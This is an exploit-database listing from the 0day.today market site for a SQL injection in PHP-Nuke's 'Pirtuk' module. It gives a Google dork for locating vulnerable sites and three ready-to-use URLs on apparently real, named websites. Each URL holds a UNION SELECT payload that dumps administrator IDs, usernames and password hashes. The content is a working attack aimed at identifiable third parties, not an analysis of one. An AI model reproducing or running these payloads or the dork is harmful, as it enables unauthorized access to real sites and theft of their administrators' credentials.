[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-NUKE - 'Pirtuk' Module SQL injection Vulnerability

Author
Scientist
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15933
Category
web applications
Date add
07-05-2011
Platform
php
# Exploit Title: [PHP-NUKE - 'Pirtuk' Module SQL injection Vulnerability]
# Date: [06.0.2011]
# Author: [Scientist]
# Category: [webapps]
# Google dork: [inurl:name=Pirtuk]
# Tested on: [linux]
# Demo site:
[
http://www.zazaistan.com/modules.php?op=modload&name=Pirtuk&file=index&l_op=viewlink&cid=11+and+1=0+union+select+concat%28aid,0x3a,name,0x3a,pwd%29,2+from+zazii23_authors--
http://www.imrak.rebir.com/modules.php?op=modload&name=Pirtuk&file=index&l_op=viewlink&cid=11+and+1=0+union+select+concat%28aid,0x3a,name,0x3a,pwd%29,2+from+zazii23_authors--
http://ww.kurdis.net/modules.php?op=modload&name=Pirtuk&file=index&l_op=viewlink&cid=11+and+1=0+union+select+concat%28aid,0x3a,name,0x3a,pwd%29,2+from+zazii23_authors--
]



#  0day.today [2024-11-14]  #